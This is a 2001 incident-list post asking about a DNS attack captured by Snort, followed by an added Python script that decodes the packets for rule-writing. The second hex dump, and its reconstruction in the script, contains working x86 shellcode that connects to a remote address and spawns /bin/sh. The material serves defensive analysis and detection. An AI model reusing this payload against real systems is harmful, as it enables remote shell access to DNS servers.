I'm posting this to both incidents and snort-users -- apologies to those who see this twice.

Here are a couple of packet dumps captured by snort from a single DNS session. The second represents what looks like shell code and triggers the 'RPC EXPLOIT statdx' alert in snort. Perhaps the snort rule alert message should be changed to be less specific, or another rule added that is specific to port 53 with an appropriate message.

Does anyone recognise this attack?

Cheers, Russell.

[**] DNS named iquery attempt [**]
11/24-00:51:18.968347 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x1FB
209.235.8.118:2072 -> 130.216.191.6:53 UDP TTL:43 TOS:0x0 ID:11539 IpLen:20 DgmLen:493
Len: 473
2F A6 09 80 00 00 00 01 00 00 00 00 3E 41 41 41  /...........>AAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 3E 42 42 42 42  AAAAAAAAAAA>BBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 3E 43 43 43 43 43  BBBBBBBBBB>CCCCC
43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
43 43 43 43 43 43 43 43 43 3E 00 01 02 03 04 05  CCCCCCCCC>......
06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15  ................
16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25  .......... !"#$%
26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35  &'()*+,-./012345
36 37 38 39 3A 3B 3C 3D 3E 45 45 45 45 45 45 45  6789:;<=>EEEEEEE
45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45  EEEEEEEEEEEEEEEE
45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45  EEEEEEEEEEEEEEEE
45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45  EEEEEEEEEEEEEEEE
45 45 45 45 45 45 45 3E 46 46 46 46 46 46 46 46  EEEEEEE>FFFFFFFF
46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46  FFFFFFFFFFFFFFFF
46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46  FFFFFFFFFFFFFFFF
46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46  FFFFFFFFFFFFFFFF
46 46 46 46 46 46 3D 47 47 47 47 47 47 47 47 47  FFFFFF=GGGGGGGGG
47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47  GGGGGGGGGGGGGGGG
47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47  GGGGGGGGGGGGGGGG
47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47  GGGGGGGGGGGGGGGG
47 47 47 47 00 00 01 00 01 00 00 00 01 00 FF 40  GGGG...........@
66                                               f

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] RPC EXPLOIT statdx [**]
11/24-00:51:19.186260 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x228
209.235.8.118:2072 -> 130.216.191.6:53 UDP TTL:43 TOS:0x0 ID:11543 IpLen:20 DgmLen:538
Len: 518
2F A6 00 00 00 01 00 00 00 00 00 01 3C 90 89 E6  /...........<...
83 C6 40 C7 06 02 00 0B AC C7 46 04 97 C4 47 A0  ..@.......F...G.
31 C0 89 46 08 89 46 0C 31 C0 89 46 28 40 89 46  1..F..F.1..F(@.F
24 40 89 46 20 8D 4E 20 31 DB 43 31 C0 83 C0 66  $@.F .N 1.C1...f
51 53 50 CD 80 89 46 20 90 3C 90 8D 06 89 46 24  QSP...F .<....F$
31 C0 83 C0 10 89 46 28 58 5B 59 43 43 FF 76 20  1.....F(X[YCC.v 
CD 80 5B 4F 74 32 8B 04 24 89 46 08 90 BD D1 EB  ..[Ot2..$.F.....
08 76 89 6E 04 C7 06 03 80 35 86 B8 04 00 00 00  .v.n.....5......
8D 0E 31 D2 83 C2 0C CD 80 C7 06 02 00 61 A9 89  ..1..........a..
6E 04 90 31 FF 47 EB 88 90 31 C0 83 C0 3F 31 C9  n..1.G...1...?1.
50 CD 80 58 41 CD 80 C7 06 2F 62 69 6E C7 46 04  P..XA..../bin.F.
2F 73 68 00 89 F0 83 C0 08 89 46 08 31 C0 89 46  /sh.......F.1..F
0C B0 0B 8D 56 0C 8D 4E 08 89 F3 CD 80 31 C0 40  ....V..N.....1.@
CD 80 3E 41 41 41 41 41 41 41 41 41 41 41 41 41  ..>AAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 3E 42 42 42 42 42 42 42 42 42 42 42 42 42 42  A>BBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
03 43 43 43 10 06 00 00 00 B7 FD FF FF E3 FF FF  .CCC............
FF 00 FF FF FF 3E 41 41 41 41 41 41 41 41 41 41  .....>AAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 3E 42 42 42 42 42 42 42 42 42 42 42  AAAA>BBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
42 42 42 10 43 43 43 43 43 43 43 43 43 43 43 43  BBB.CCCCCCCCCCCC
43 43 43 43 00 00 01 00 01 00 00 FA 00 FF        CCCC..........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Russell Fulton, Computer and Network Security Officer
The University of Auckland, New Zealand

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
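Editor's note (added example, not part of Russell's post and not snort code): the two dumps can be read as DNS wire format rather than as an RPC payload, which is what a port-53-specific rule would have to do. Decoding the 12-byte header of the first packet gives flags 0x0980, i.e. opcode 1 (IQUERY, the inverse query that the iquery rule keys on) with QDCOUNT 0 and ANCOUNT 1; the single answer record ends with RDLENGTH 0x00FF but only two bytes of data. In the second packet the flags are 0x0000 (a normal query) and the 60-, 60-, 12-, 49- and 12-byte labels of the question name each contain `CD 80` (x86 Linux `int 0x80`), with the `/bin` and `/sh` fragments visible in the ASCII column; the additional section holds a record with a root name, type 0x00FA (250, the TSIG type number from RFC 2845) and class 0x00FF (ANY), cut off before its TTL. The script below rebuilds both payloads from the hex above (runs such as 62 x 'A' are written as `b"A" * 62`), decodes them, and reports exactly those observations; the function names, finding strings and the choice of what to flag are this example's own, and it says nothing about which exploit the packets belong to.

```python
"""DNS wire-format triage for the two UDP/53 payloads in the post above.
Added example, not code from the original post or from snort. Decodes the
12-byte header, walks every name label by label and lists what stands out.
Payloads are rebuilt from the dumps (62 x 'A' written as b"A" * 62)."""
import struct

OPCODES = {0: "QUERY", 1: "IQUERY", 2: "STATUS"}
RRTYPES, RRCLASSES = {1: "A", 250: "TSIG"}, {1: "IN", 255: "ANY"}   # 250 = TSIG, RFC 2845
SYSCALL = b"\xcd\x80"          # x86 Linux "int 0x80", as seen in the second dump

def read_name(buf, off):
    """Return (labels, offset just past the name). Labels are raw bytes."""
    labels = []
    while True:
        if off >= len(buf):
            raise ValueError("name runs off the end of the packet")
        n = buf[off]
        if n == 0:
            return labels, off + 1
        if n & 0xC0 == 0xC0:   # compression pointer (RFC 1035 4.1.4); not used here
            return labels, off + 2
        if n > 63:
            raise ValueError("label length %d > 63" % n)
        labels.append(buf[off + 1:off + 1 + n])
        off += 1 + n

def triage(buf):
    """Decode one DNS message and return a list of findings (strings)."""
    if len(buf) < 12:
        return ["short packet: %d bytes" % len(buf)]
    ident, flags, qd, an, ns, ar = struct.unpack("!6H", buf[:12])
    opcode = OPCODES.get((flags >> 11) & 0xF, "opcode%d" % ((flags >> 11) & 0xF))
    out = ["id=0x%04x opcode=%s qd=%d an=%d ns=%d ar=%d" % (ident, opcode, qd, an, ns, ar)]
    off = 12
    try:   # sections: (name, record count, carries ttl/rdlength/rdata?)
        for sec, count, is_rr in (("qd", qd, False), ("an", an, True),
                                  ("ns", ns, True), ("ar", ar, True)):
            for _ in range(count):
                labels, off = read_name(buf, off)
                for lab in labels:
                    if SYSCALL in lab:
                        out.append("%s: %d-byte label contains int 0x80" % (sec, len(lab)))
                    elif any(b < 0x20 or b > 0x7E for b in lab):
                        out.append("%s: %d-byte label with non-printable bytes" % (sec, len(lab)))
                if off + 4 > len(buf):
                    raise ValueError("%s: type/class cut off" % sec)
                rtype, rclass = struct.unpack("!HH", buf[off:off + 4])
                off += 4
                out.append("%s: type=%s class=%s" % (sec, RRTYPES.get(rtype, rtype),
                                                    RRCLASSES.get(rclass, rclass)))
                if is_rr:
                    if off + 6 > len(buf):
                        raise ValueError("%s: ttl/rdlength cut off" % sec)
                    rdlen = struct.unpack("!H", buf[off + 4:off + 6])[0]
                    off += 6
                    if off + rdlen > len(buf):
                        raise ValueError("%s: rdlength %d but only %d bytes left"
                                         % (sec, rdlen, len(buf) - off))
                    off += rdlen
    except ValueError as err:
        out.append("malformed: %s" % err)
    return out

def L(data):   # one label: length byte followed by the data
    return bytes([len(data)]) + data

H = bytes.fromhex
# "DNS named iquery attempt" payload: 465 bytes (UDP Len 473 minus the 8-byte UDP header).
IQUERY_PKT = (
    H("2FA6 0980 0000 0001 0000 0000") + L(b"A" * 62) + L(b"B" * 62) + L(b"C" * 62)
    + L(bytes(range(0x3E))) + L(b"E" * 62) + L(b"F" * 62) + L(b"G" * 61) + b"\x00"
    + H("0001 0001 00000001 00FF 4066"))  # A IN ttl=1 rdlength=255, then only 2 bytes

# "RPC EXPLOIT statdx" payload: 510 bytes (UDP Len 518 minus 8).
SHELLCODE_PKT = (
    H("2FA6 0000 0001 0000 0000 0001")
    + L(H("90 89 E6 83 C6 40 C7 06 02 00 0B AC C7 46 04 97 C4 47 A0 "
          "31 C0 89 46 08 89 46 0C 31 C0 89 46 28 40 89 46 "
          "24 40 89 46 20 8D 4E 20 31 DB 43 31 C0 83 C0 66 51 53 50 CD 80 89 46 20 90"))
    + L(H("90 8D 06 89 46 24 31 C0 83 C0 10 89 46 28 58 5B 59 43 43 FF 76 20 "
          "CD 80 5B 4F 74 32 8B 04 24 89 46 08 90 BD D1 EB "
          "08 76 89 6E 04 C7 06 03 80 35 86 B8 04 00 00 00 8D 0E 31 D2 83 C2"))
    + L(H("CD 80 C7 06 02 00 61 A9 89 6E 04 90"))
    + L(H("FF 47 EB 88 90 31 C0 83 C0 3F 31 C9 50 CD 80 58 41 CD 80 C7 06 "
          "2F 62 69 6E C7 46 04 2F 73 68 00 89 F0 83 C0 08 89 46 08 31 C0 89 46 "
          "0C B0 0B 8D 56"))
    + L(H("8D 4E 08 89 F3 CD 80 31 C0 40 CD 80"))
    + L(b"A" * 62) + L(b"B" * 62) + L(b"CCC")
    + L(H("06 00 00 00 B7 FD FF FF E3 FF FF FF 00 FF FF FF"))
    + L(b"A" * 62) + L(b"B" * 62) + L(b"C" * 16) + b"\x00"
    + H("0001 0001")        # question: type A, class IN
    + H("00 00FA 00FF"))    # additional: root name, type 250 (TSIG), class ANY, nothing after

if __name__ == "__main__":
    for name, pkt in (("iquery", IQUERY_PKT), ("statdx-alert", SHELLCODE_PKT)):
        print("== %s, %d bytes" % (name, len(pkt)), *triage(pkt), sep="\n  ")
```

Running it prints, for the first packet, the IQUERY opcode and the answer record whose RDLENGTH of 255 overruns the two remaining bytes, and for the second, five labels carrying `int 0x80`, one 16-byte binary label, and a TSIG/ANY additional record with no TTL or RDLENGTH behind it. Any of those three conditions (opcode 1, non-printable label contents, a record that does not fit in the datagram) is something a rule scoped to port 53 could state in its message instead of "statdx".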
This archive was generated by hypermail 2b30 : Sun Nov 25 2001 - 14:41:10 PST